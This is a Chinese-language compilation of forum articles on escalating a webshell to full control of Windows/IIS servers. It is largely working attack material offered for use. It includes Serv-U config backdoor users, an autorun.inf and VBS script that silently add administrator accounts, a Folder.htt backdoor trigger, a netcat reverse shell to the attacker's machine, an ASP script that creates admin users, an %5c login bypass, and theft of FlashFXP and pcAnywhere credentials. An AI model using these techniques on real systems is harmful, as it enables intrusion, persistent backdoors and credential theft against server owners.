WEB安全,SHELL權限提升技巧大全打賞

c: d: e:.....

C:\Documents and Settings\All Users\「開始」菜單\程序\

看這里能不能跳轉,我們從這里可以獲取好多有用的信息比如Serv-U的路徑,

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\

看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密碼,登陸

c:\Program Files\serv-u\

C:\WINNT\system32\config\

下它的SAM,破解密碼

c:\winnt\system32\inetsrv\data\

是erveryone 完全控制,很多時候沒作限制,把提升權限的工具上傳上去,然后執行

c:\prel

C:\Program Files\Java Web Start\

c:\Documents and Settings\

C:\Documents and Settings\All Users\

c:\winnt\system32\inetsrv\data\

c:\Program Files\

c:\Program Files\serv-u\

C:\Program Files\Microsoft SQL Server\

c:\Temp\

c:\mysql\(如果服務器支持PHP)

c:\PHP(如果服務器支持PHP)

運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權限

還可以用這段代碼試提升,好象不是很理想的

如果主機設置很變態,可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs等木馬。

根目錄下隱藏autorun.inf

C:\PROGRAM FILES\KV2004\ 綁

D:\PROGRAM FILES\RISING\RAV\

C:\Program Files\Real\RealServer\

rar

Folder.htt與desktop.ini

將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下

replace 替換法 捆綁

腳本 編寫一個啟動/關機腳本 重起

刪SAM 錯

CAcls命令

FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak

Ring的權限提升21大法!

以下全部是本人提權時候的總結 很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過

的。本人不才,除了第一種方法自己研究的,其他的都是別人的經驗總結。希望對朋友有幫助!

1.radmin連接法

條件是你權限夠大,對方連防火墻也沒有。封裝個radmin上去,運行,開對方端口,然后radmin上去

。本人從來米成功過。,端口到是給對方打開了。

2.paanywhere

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF

文件,在本地安裝pcanywhere上去

3.SAM破解

C:\WINNT\system32\config\ 下他的SAM 破解之

4.SU密碼奪取

C:\Documents and Settings\All Users\「開始」菜單\程序\

引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉

進去后,如果有權限修改ServUDaemon.ini,加個用戶上去,密碼為空

[USER=WekweN|1]

Password=

HomeDir=c:\

TimeOut=600

Maintenance=System

Access1=C:\|RWAMELCDP

Access1=d:\|RWAMELCDP

Access1=f:\|RWAMELCDP

SKEYvalues=

這個用戶具有最高權限,然后我們就可以ftp上去 quote site exec xxx 來提升權限

5.c:\winnt\system32\inetsrv\data\

引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,

然后執行

6.SU溢出提權

這個網上教程N多 不詳細講解了

7.運行Csript

引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提

升權限

用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

查看有特權的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

再將asp.dll加入特權一族

asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)

我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了 8.腳本提權

c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs

9.VNC

這個是小花的文章 HOHO

默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password

我們可以用vncx4

破解它,vncx4使用很簡單,只要在命令行下輸入

c:\>vncx4 -W

然后順序輸入上面的每一個十六進制數據,沒輸完一個回車一次就行了。

10.NC提權

給對方來個NC 但是條件是你要有足夠的運行權限 然后把它反彈到自己的電腦上 HOHO OK了

11.社會工程學之GUEST提權

很簡單 查看他的擁護 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵

箱號 手機號 盡量看看 HOHO

12.IPC空連接

如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令

13.替換服務

這個不用說了吧?個人感覺相當復雜

14.autorun .inf

autorun=xxx.exe 這個=后面自己寫 HOHO 加上只讀、系統、隱藏屬性 傳到哪個盤都可以的 不相信

他不運行

15.desktop.ini與Folder.htt

引用:首先,我們現在本地建立一個文件夾,名字不重要,進入它,在空白處點右鍵,選擇"自定義

文件夾"(xp好像是不行的)一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Folder

setting的文件架與desktop.ini的文件,(如果你看不到,先取消"隱藏受保護的操作系統文件")然后

我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼: <OBJECT

ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后門文件名">

</OBJECT> 然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方

任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執行了我們的后門

16.su覆蓋提權

本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重

起一下Serv-U,于是你上面的所有配置都與他的一模一樣了

17.SU轉發端口

43958這個是 Serv -U 的本地管理端口。FPIPE.exe上傳他,執行命令: Fpipe –v –l 3333 –r

43958 127.0.0.1 意思是將4444端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u,新建一個

服務器,IP填對方IP,帳號為LocalAdministrator 密碼為#[email protected]$ak#.1k;[email protected] 連接上后你就可以管理他的

Serv-u了

18.SQL帳戶密碼泄露

如果對方開了MSSQL服務器,我們就可以通過用SQL連接器加管理員帳號(可以從他的連接數據庫的

ASP文件中看到),因為MSSQL是默認的SYSTEM權限。

引用:對方沒有刪除xp_cmdshell 方法:使用Sqlexec.exe,在host 一欄中填入對方IP,User與Pass

中填入你所得到的用戶名與密碼。format選擇xp_cmdshell"%s"即可。然后點擊connect,連接上后就可

以在CMD一欄中輸入你想要的CMD命令了

19.asp.dll

引用:因為asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定相同

)

我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"

好了,現在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去

了,注意,用法中的get和set,一個是查看一個是設置.還有就是你運行上面的你要到

C:\Inetpub\AdminScripts>這個目錄下.

那么如果你是一個管理員,你的機子被人用這招把asp提升為system權限,那么,這時,防的方法就是把

asp.dll T出特權一族,也就是用set這個命令,覆蓋掉剛才的那些東東.

20.Magic Winmail

前提是你要有個webshell 引用。具體谷歌。

21.DBO……

其實 提升權限的方式很多的 就看大家怎么利用了 HOHO 加油吧 將服務器控制到底!

WEBSHELL權限提升

一 serv-u提升

看看PROGRAME里面有些什么程序,哦,有SERV-U,記得有次看到SERV-U有默認的用戶名和密碼,但是監聽的端口是43958,而且是只有本地才能訪問的,但是我們有端口轉發工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21

顯示竟然是3.0的,唉,不得不說這個管理員真的不稱職。后來完畢后掃描了下,也只有FTP的洞沒有補。既然是這樣,我們就開始我們的提升權限了

上傳FPIPE,端口轉發工具

在運行CMD命令里輸入d:\\wwwroot\\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本機的43598端口轉發到81端口

然后打開我們自己機子上的SERV-U,點Serv-U服務器,點菜單欄上的的服務器,點新建服務器,然后輸入IP,輸入端口,記得端口是剛剛我們轉發的 81端口。服務名稱隨便你喜歡,怎么樣都行。然后是用戶名:LocalAdministrator 密碼:#[email protected]$ak#.lk;[email protected] (密碼都是字母)

確定,然后點剛剛建的服務器,然后就可以看到已有的用戶,自己新建一個用戶,把所有權限加上。也不鎖定根目錄

接下來就是登陸了,登陸FTP一定要在CMD下登陸,

進入后一般命令和DOS一樣,添加用戶的時候

ftp>quote site exec net.exe user hk pass /add

ftp>quote site exec net.exe localgroup administrators hk/add

如果對方開了3389的話,就不用我教你怎么做了,沒開的話,新建立IPC連接,在上傳木馬或者是開啟3389的工具

auto.ini 加 SHELL.VBS

autorun.inf

[autorun]

open=shell.vbs

shell.vbs

dim wsh

set wsh=createObject("WScript.Shell")

wsh.run "net user guest /active:yes",0

wsh.run "net user guest 520ls",0

wsh.run "net localgroup administrators guest /add",0

wsh.run "net user hkbme 520ls /add",0

wsh.run "net localgroup administrators hkbme /add",0

wsh.run "cmd.exe /c del autorun.inf",0

wsh.run "cmd.exe /c del shell.vbs",0

但是這樣要可以訪問到對方的根目錄。將這兩個文件放到對方硬盤的根目錄下。當然你也可以直接執行木馬程序,還要一個木馬程序,但是語句就和最后兩句一樣,通過CMD執行木馬程序

Folder.htt與desktop.ini

將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下,覺得一個不夠,可以多放幾個

Folder.htt添加代碼

<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后門文件名">

</OBJECT>

但是后門和這兩個文件必須要放到一塊,有點問題,可以結合啟動VBS,運行結束后,刪除上傳的后門.就是CODEBASE="shell.vbs".shell寫法如上

replace

替換法,可以替換正在執行的文件。用這個幾乎可以馬上得到權限,但是我沒有做過試驗,可以試下,將對方正在執行的文件替換為和它文件名一樣的,捆綁了木馬的。為什么不直接替換木馬呢?如果替換的是關鍵程序,那不是就直接掛了?所以還是捆綁好點

格式

REPLACE [drive1:][path1]filename [drive2:][path2] [/A]

[/R] [/W]

REPLACE [drive1:][path1]filename [drive2:][path2]

[/R] [/S] [/W]

[drive1:][path1]filename 指定源文件。

[drive2:][path2] 指定要替換文件的

目錄。

/A 把新文件加入目標目錄。不能和

/S 或 /U 命令行開關搭配使用。

/P 替換文件或加入源文件之前會先提示您

進行確認。

/R 替換只讀文件以及未受保護的

文件。

/S 替換目標目錄中所有子目錄的文件。

不能與 /A 命令選項

搭配使用。

/W 等您插入磁盤以后再運行。

/U 只會替換或更新比源文件日期早的文件。

不能與 /A 命令行開關搭配使用

這個命令沒有試驗過,看能不能替換不能訪問的文件夾下的文件,大家可以試驗下

腳本

編寫一個啟動/關機腳本配置文件scripts.ini,這個文件名是固定的,不能改變。內容如下:

[Startup]

0CmdLine=a.bat

0Parameters=

將文件scripts.ini保存到"C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts"

A.BAT的內容可以是NET USER yonghu mima

也可以是NET USER ADMINistrator XXX

這樣可以恢復你想要得任意用戶名的密碼,也可以自己增加新的用戶,但是要依賴重啟,還有就是對SYSTEM32有寫的權限

SAM

如果可以訪問對方的SYSTEM32的話,刪除對方的SAM文件,等他重啟以后就是ADMIN用戶密碼為空

突然又有了想法,可以用REPLACE命令替換的嗎,可以把你的SAM文件提取出來,上傳到他的任意目錄下,然后替換。不過不知道如果對SYSTEM32沒有權限訪問的話,能不能實現替換

使用FlashFXP來提升權限 最近各位一定得到不少肉雞吧,從前段時間的動網的upfile漏洞, 動力文章系統最新漏洞到first see發現的動網sql版本的一個超級大漏洞。有人一定忙的不易樂乎,大家的方法也不過是使用一下asp腳本的后門罷了。至于提 升權限的問題呵呵,很少有人能作一口氣完成。關鍵還是在提升權限上做個問題上,不少服務器設置的很BT,你的asp木馬可能都用不了,還那里來的提升啊。我們得到webshell也就是個低級別的用戶的權限,各種提升權限方法是可謂五花八門啊,如何提升就看你自己的妙 招了。

其一,如果服務器上有裝了pcanywhere服務端,管理員為了便于管理也給了我們方便,到系統盤的 Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下載*.cif本地破解就使用pcanywhere連接就ok了。

其二,如果對方有Serv-U大家不要罵我啊,通過修改ServUDaemon.ini和fpipe這軟件提升權限應該是不成問題吧。

其三,通過替換系統服務來提升。

其四,查找conn和config這類型的文件看能否得到sa或者mysql的相關密碼,可能會有所收獲等等。

本人在一次無聊的入侵過程中發現了這個方法,使用Flashfxp也能提升權限,但是成功率高不高就看你自己的運氣了

本人www.xxx.com 通過bbs得到了一個webshell,放了個小馬(現在海陽的名氣太大了偶不敢放),而且已經將一段代碼插入了N個文件中,夠黑吧。提升權限沒時間做。在我放假回家后,一看我暈bbs升級到動網sp2了我放的小馬也被K了,人家的BBS是access版本的。郁悶啊!突然想起我將一個頁面插入了asp的后門,看看還有沒有希望了。輸www.xxx.com/xx.asp?id =1 好家伙,還在!高興ing

于是上傳了一個asp的腳本的后門,怎么提升權限呢?

在這個網站的主機上游蕩了N分鐘,在C:\\ Program Files下發現了FlashFXP文件夾(跟我一樣使用這個軟件自己心里暗想)圖2,于是就打了了Sites. dat這個文件(編輯)這是什么東西密碼和用戶名,而且密碼是加了密的。

如果我把這些文件copy回本地也就是我的計算機中,替換我本地的相應文件會怎么樣呢?

于是我就將Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak幾個文件下載到我的計算機中替換了我電腦中flashfxp文件夾的相應文件。打開flashfxp 在站點中打開站點管理器一項。乖 乖發財了

對方管理員通過flashfxp連接的各個站點都在圖3,點擊連接。通過了于是我們又有了一堆肉雞,我們有ftp權限。上傳腳本 木馬~ 呵呵。

說了半天這提升權限的事情一點沒講啊

不要急,大家看看對方管理員的這站點管理器,有用戶名和密碼,密碼是星號的。可惜啊!

又想起了在Sites.dat中也顯示了密碼和用戶名,而且密碼是加密的。

現在的星號密碼會不會也是加了密的?看看就行了唄。

怎么看? 菜鳥了吧 手頭有個不錯的查看星號的軟件,就是xp星號密碼查看器,通過查看跟Sites.dat中加密了密碼做比較。看圖4和圖5 的比較 很顯然在站點管理器中查看到的密碼是明文顯示的。發財了吧

下一步就是使用xp星號密碼查看器這個軟件來提取密碼和用戶名。看者這些復雜的密碼,還真有點懷念當年玩sniff的時光。呵呵

密碼為:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+

用戶名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69

(上述部分密碼和用戶名已經作了必要的修改)

這么多的信息,按社會工程學的概念來說,沒有管理員的密碼。打死我也不相信。最終我得到了這個網站管理員的密碼從這堆東西中找到 的。

我想這個問題應該反饋到flashfxp官方,讓他們在下個版本中修正這個漏洞或者說是錯誤。經過后來測試只要把含有密碼和用戶名的Sites.dat文件替換到本地相應的文件就可以在本地還原對方管理員的各個站點的密碼。希望大家在入侵的時候遇到fla shfxp的時候能想到這個方法,至少也可以得到一堆新的肉雞。不防試試?希望能給大家滲透帶來幫助。

將asp權限提到最高by: cnqing from:http://friend.91eb.com

本來是要寫個提權asp木馬的,可惜時間不是太多功底也不是太深。先把原理方法告訴大家好了。簡單說說,說的太麻煩沒有必要。懂了就行。

原理:

asp文件的教本解釋是由asp.dll運行的。由dllhost.exe啟動的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接啟動。身份是system

方法:

第一步。

得到inprocesslsapiapps內容,用命令"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"。將得到的一組dll復制下來。

第二步

寫一個bat內容為"cscript C:\\Inetpub\\AdminScripts\\ adsutil vbs set w3svc/inprpocessisapiapps "C:\\Inetpub\\AdminScripts\\asp.dll" ·····

省略號為復制下的內容。中間用空格分開不要帶回車符

最后運行這個bat就行了。

例如:

我用"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"得到

"c:\\winnt\\system32\\inetsrv\\httpext.dll"

"c:\\winnt\\system32\\inetsrv\\httpodbc.dll"

"C:\\WINNT\\system32\\inetsrv\\ssinc.dll"

"C:\\WINNT\\System32\\msw3prt.dll"

"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_aut\\author.dll"

"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_adm\\admin.dll"

"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll"

那么你的bat就應該是:

cscript C:\\Inetpub\\AdminScripts\\adsutil vbs set w3svc/inprpocessisapiapps "C:\\Inetpub\\AdminScripts\\asp.dll" "c:\\winnt\\system32\\inetsrv\\httpext.dll" "c:\\winnt\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\System32\\msw3prt.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_aut\\author.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_adm\\admin.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll"

已測試成功!!

利用%5c繞過驗證

說到%5c,你是不是想起了當前流行的那個%5c暴庫漏洞,呵呵,本文就是對%5c利用的探索(呵呵,當然有我提出的新東東,或許對你有幫助哦^_^)。

好,我們先追根溯源,找到那個漏洞的老底。

N 年以前利用這個漏洞可以實現目錄遍歷,雖然微軟出了補丁,不過好像補丁是用來限制iis只能訪問虛擬目錄的,所以漏洞還是存在,只不過利用方式變了。對 iis來說,提交一個含有%5c的url能夠找到文件,但是該文件里以相對路徑引用的其他文件卻找不到了(%5c是\\的url編碼,iis跳轉到上一級目錄去找,當然找不到;頭暈了吧,哈哈,我也頭暈啊)。

后來這個漏洞就被牛人挖掘出來了,也就是傳說中的%5c暴庫:由于連接數據庫的文件引用的相對路徑,提交%5c找不到文件,所以導致出錯,iis就會老老實實的說出數據庫的路徑(不明白?找google)。

一個偶然的機會我發現還可以利用%5c繞過asp的驗證;當我們暴庫失敗的時候不妨試試。

廢話少說,看下面的代碼:

<!--#INCLUDE file="conn.asp" -->

<%

guest_user=trim(request("guest_user"))

guest_password=trim(request("guest_password"))

Set rs= Server.createObject("ADODB.Recordset")

sql="select * from admin where id=1"

rs.open sql,conn,3,2

readuser=rs("guest_user")

readpassword=rs("guest_password")

if readuser<>guest_user or readpassword<>guest_password then

response.write "請輸入正確地管理員密碼!"

response.end

else

session("admin")=1 \'登陸后寫入seesion中保存

response.write("登陸成功,請返回信息頁")

end if

%>

看到沒有,要想通過驗證必須讓數據庫里的用戶名密碼與提交的一致;想到什么?讓我們再看看數據庫連接文件代碼:

<%

on error resume next

set conn=server.createobject("adodb.connection")

DBPath = Server.MapPath("guestbook.asp")

conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath

%>

啊,有容錯語句不能暴庫!等等,如果提交%5c數據庫找不到,由于容錯,所以程序會繼續執行,那么說來從數據庫得到的用戶名密碼皆為空(想想有時暴庫失敗是不是看到空空的框架,因為數據都是空嘛),哈哈,這樣我們就繞過驗證了!

知道怎么做了吧,把登陸頁面保存到本地,修改提交的url,把最后一個/改成%5c,用戶名密碼用空格(有的程序會檢查用戶名密碼是否為空,空格會被程序過濾),提交,就ok了。

誒,各位不要以為我自己沒事寫段代碼來搗鼓,實際上這個是我們學校一個高手做的留言板程序,就掛在學校的主頁,呵呵。

既然弄懂了原理,當然要找實際漏洞啦,自然是拿大名鼎鼎的"洞"網論壇開刀。不過失敗了,因為它的數據庫連接文件里有這么一段:

If Err Then

err.Clear

Set Conn = Nothing

Response.Write "數據庫連接出錯,請檢查連接字串。"

Response.End

End If

數據庫找不到程序就結束了,呵呵,空歡喜一場。

接著又去down了bbsxp論壇,打開數據庫連接文件,暈,根本沒有容錯語句;呵呵,不過可以暴庫哦。

我又不是BT,所以不去找事了,寫篇文章,算是給各位高手提供資料吧。

總結一下這個攻擊方法成功的條件:1、數據庫連接用的相對路徑且僅有簡單的容錯語句;2、服務器iis版本為4或5;3、程序里不檢查空字符或者檢查時不過濾空格而比較時過濾空格;4、程序不能在一級目錄

至于防范,呵呵,既然攻擊條件知道了,防范措施自然也出來了^_^

添加超級用戶的.asp代碼[藍屏的原創,凱文改進,Ms未公布的漏洞]

作者:藍屏,凱文 文章來源:冰點極限

其實上個禮拜我和凱文就在我的肉雞上測試了,還有河馬史詩.結果是在user權限下成功添加Administrators組的用戶了(雖然我不敢相信我的眼睛).

上次凱文不發話,我不敢發布啊....現在在他的blog 上看到他發布了,就轉來了咯(比我上次測試時還改進了一點,加了個表單).這下大家有福咯```

反正代碼是對的,但是很少能成功,具體的看運氣了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。

<head>.network對象腳本權限提升漏洞利用工具</head>

<form action="useradd.asp" method=post>

用戶:<input name="username" type="text" value="kevin1986"><br>

密碼:<input name="passwd" type="password"><br>

<input type="submit" value="添 加">

</form>

<%@codepage=936

on error resume next

if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then

response.write "iP !s n0T RiGHt"

else

if request("username")<>"" then

username=request("username")

passwd=request("passwd")

Response.Expires=0

Session.TimeOut=50

Server.ScriptTimeout=3000

set lp=Server.createObject("WSCRIPT.NETWORK")

oz="WinNT://"&lp.ComputerName

Set ob=GetObject(oz)

Set oe=GetObject(oz&"/Administrators,group")

Set od=ob.create("user",username)

od.SetPassword passwd

od.SetInfo

oe.Add oz&"/"&username

if err then

response.write "哎~~今天你還是別買6+1了……省下2元錢買瓶可樂也好……"

else

if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登錄")>0 then

response.write "雖然沒有錯誤,但是好象也沒建立成功.你一定很郁悶吧"

else

Response.write "OMG!"&username&"帳號居然成了!這可是未知漏洞啊.5,000,000RMB是你的了"

end if

end if

else

response.write "請輸入輸入用戶名"

end if

end if

%>

如何繞過防火墻提升權限

首先確定一下目標:http://www.***.com ,常見的虛擬主機。利用Upfile的漏洞相信大家獲得webshell不難。我們這次獲得這個webshell,不是DVBBS,而是自由動力3.6的軟件上傳過濾不嚴。網站http://www.***.com/lemon/Index.asp 是自由動力3.6文章系統。Xr運用 WinHex.exe和WSockExpert.exe上傳一個網頁木馬newmm.asp,用過動鯊的 door.exe的人都知道,這個是上傳asp木馬內容的。于是,上傳海洋2005a,成功獲得webshell。

測試一下權限,在cmd里運行set,獲得主機一些信息,系統盤是D盤,也說明了我們的webshell有運行權限的。那我們看看C盤有什么呢?難道是雙系統?瀏覽后發現沒有什么系統文件,只有一些垃圾文件,暈死。沒關系,再來檢查一下,虛擬主機都有serv-u的,這臺也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。

思路:上傳serv-u本地溢出文件srv.exe和nc.exe利用nc來反連接獲得系統shell。大家是不是發現海洋2005a那個上傳的組件不好用(反正我總遇到這個問題),沒關系,用rain改的一個無組件上傳,一共有3個文件,up.htm, upload.asp和 uploadclass.asp。upload.asp和uploadclass.asp上傳到同一個文件夾,up.htm是本地用的,修改up.htm 里的鏈接地址為:http://www.***.com/lemon/upload.asp就可以上傳了。

傳上了srv.exe和nc.exe在H:\\long\\sun***\\lemon(網站目錄)后,發現沒有運行權限。沒關系,根據經驗,一般系統下 D: \\Documents and Settings\\All Users\\是應該有運行權限的。于是想把文件copy過去,但是發現我們的 webshell沒有對D盤寫的權限,暈死。

可以瀏覽D:\\program files\\serv-u\\ServUDaemon.ini,不能改,難道要破解serv-u的密碼,暈,不想。

不可以這么就泄氣了,我突然想到為什么系統不放在C盤了,難道C盤是FAT32分區的?(后來證明了我們的想法。這里說一下,如果主機有win98的系統盤,那里99%是FAT32分區的。我們還遇到過裝有Ghost的主機,為了方便在DOS下備份,它的備份盤一般都是FAT分區的。)如果系統盤是 FAT32分區,則網站就沒有什么安全性可言了。雖然C盤不是系統盤,但是我們有執行權限。呵呵,copy srv.exe和nc.exe到c:\\,運行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",這里的202.*.*.*是我們的肉雞,在這之前我們已經在肉雞上運行了nc –l –p 888。我們在學校內網里,沒有公網ip,不爽-ing。

我們成功獲得一個系統shell連上肉雞。(看起來簡單,其實這里我們也遇到過挫折,我們發現有些版本的nc居然沒有-e這個參數,還以為全世界nc功能都一樣。后來又發現不同版本的nc互連不成功,會出現亂碼,沒辦法用。為此,上傳 n次,錯誤n次,傻了n次,后來終于成功了。做黑客還真得有耐心和恒心。)

高興之余,我們仍不滿足,因為這個shell實在是太慢了。于是,想用我們最常用的Radmin,其實管理員一按Alt+Ctrl+Del,看進程就能發現 r_server了,但是還是喜歡用它,是因為不會被查殺。好了,上傳admdll.dll,raddrv.dll,r_server.exe到H:\\ long\\sun***\\lemon,再用剛才nc得到的 shell把它們copy到d:\\winnt\\system32\\下,分別運行: r_server /install , net start r_server , r_server /pass:rain /save 。

一陣漫長的等待,終于顯示成功了。興沖沖用radmin連上去,發現連接失敗。暈死,忘了有防火墻了。上傳pslist和pskill上去,發現有 backice,木馬克星等。Kill掉他們雖然可以登陸,但服務器重啟后還是不行,終不是長久之計呀。防火墻是不防21,80等端口的,于是,我們的思路又回到了serv-u上了。把他的 ServUDaemon.ini下載下來,覆蓋本機的ServUDaemon.ini,在本機的serv-u上添加一個用戶名為xr,密碼為rain的系統帳號,加上所有權限。再用老辦法,上傳,用shell寫入D:\\program files\\serv-u\ \里,覆蓋掉原來的ServUDaemon.ini。雖然又等了n長時間,但是成功了,于是用flashfxp連上,發生 530錯誤。郁悶,怎么又失敗了。(根據經驗這樣應該就可以了,但為什么不行沒有想通,請高手指點。)

不管了,我們重啟serv-u就ok 了,怎么重啟呢,開始想用 shutdown重啟系統,但那樣我們就失去了nc這個shell,還可能被發現。后來,眼睛一亮,我們不是有pskill嗎?剛才用pslist發現有這個進程:ServUDaemon 。把它kill了。然后再運行D:\\program files\\serv-u\\ ServUAdmin.exe ,這里要注意不是ServUDaemon.exe 。

好了,到這里,我們直接ftp上去吧,ls一下,哈哈,系統盤在我的掌握下。我們能不能運行系統命令呢?是可以的,這樣就可以:

ftp>quote site exec net user xr rain /add

在webshell上運行net user,就可以看見添加成功了。

整個入侵滲透到這就結束了,在一陣后清理打掃后。我們就開始討論了。其實,突破防火墻有很多好的rootkit可以做到的,但是我們覺得系統自帶的服務才是最安全的后門。

 

asp.dll解析成system提升權限

網絡上傳統的提升asp權限為系統的有兩種:

1.圖形化下的,把默認站點---->主目錄--->應用程序保護設置為低,這樣就可以把asp權限設置為system.

但這種提升方法很容易被發現,所以網絡有另一種一般是用adsutil.vbs來提升權限.而這個也是今天

我要談的關于adsutil.vbs提升權限.

2.用adsutil.vbs搞定.

在網絡上我看到了很多的教你用這種方法的動畫,文章,但我至今沒有看到一篇介紹原理的,下面我談談我個人的看法:

先舉個例子:

有一群狗,這群狗里有幾個長老級狗物,它們擁有著至高無上的權限,而其它的狗,他們的權限則少得可憐.

轉到計算機上:

在IIS中,有幾個Dll文件是擁有特權限的,我們可以理解為系統權限,就像長老級的狗.而解析asp的asp.dll則就像一只

普通的狗,他的權限少得可憐.

那么,如果asp.dll也成了長老級的狗的話,那么asp不也就有了系統權限了嗎,這是可以成立的.所以我們的思路也就是

把asp.dll加入特權的dll一族之中.提升步驟為:

<1>先查看有特權一話有哪些.

<2>加asp.dll加入特權一族

好了,下面我們就來實踐這個過程.

1)查看有特權的dll文件:

命令為:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps

得到顯示為:

C:\\Inetpub\\AdminScripts>cscript adsutil.vbs get /W3SVC/InProcessIsapiApps

Microsoft (R) Windows 腳本宿主版本 5.1 for Windows

版權所有(C) Microsoft Corporation 1996-1999. All rights reserved.

InProcessIsapiApps : (LIST) (5 Items)

"C:\\WINNT\\system32\\idq.dll"

"C:\\WINNT\\system32\\inetsrv\\httpext.dll"

"C:\\WINNT\\system32\\inetsrv\\httpodbc.dll"

"C:\\WINNT\\system32\\inetsrv\\ssinc.dll"

"C:\\WINNT\\system32\\msw3prt.dll"

看到沒有,他說明的是有特權限一族為:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

這幾個文件,不同的機子,可能會不同.

2)把asp.dll加入特權一族:

因為asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的機子放的位置不一定相同)

我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\ system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"

好了,現在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去

了,注意,用法中的get和set,一個是查看一個是設置.還有就是你運行上面的你要到C:\\Inetpub\\AdminScripts>這個目錄下.

那么如果你是一個管理員,你的機子被人用這招把asp提升為system權限,那么,這時,防的方法就是把asp.dll T出特權一族,也就是用set這個命令,覆蓋掉剛才的那些東東.

